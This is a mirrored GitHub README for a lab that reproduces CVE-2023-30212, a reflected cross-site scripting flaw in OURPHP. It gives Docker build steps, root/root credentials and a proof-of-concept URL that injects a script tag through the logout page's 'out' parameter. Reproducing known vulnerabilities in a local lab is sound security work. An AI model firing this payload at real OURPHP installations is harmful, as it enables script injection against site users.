Giters

AAsh035 / CVE-2023-30212

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-30212 LAB SETUP

Prerequisite
Download docker.io
sudo apt install -y docker.io


STEPS

  1. Download all files from my repository using the below command.
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. Now to make a docker image run the following command:
    sudo docker build -t vuln .

  3. Next is to change the docker image to a conatainer.The container need to run at port 80 The command is :
    sudo docker run -d -p 80:80 vuln

  4. To check if the container is up use the command:
    sudo docker ps

  5. Type 127.0.0.1 in the browser and an OURPHP page will be loaded.

  6. You need to configure the ourphp with the following:
    Username : root
    Password : root
    Database Name: vuln

  7. Now you need to configure username and password for Administrative. Set the following:
    Username: root
    Password: root

  8. Now copy the below link and paste it in the browser:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

CVE-2023-30212.POC.mp4

About

Languages

Language:PHP 45.8%Language:JavaScript 27.1%Language:HTML 21.1%Language:CSS 5.9%Language:Smarty 0.1%Language:Dockerfile 0.0%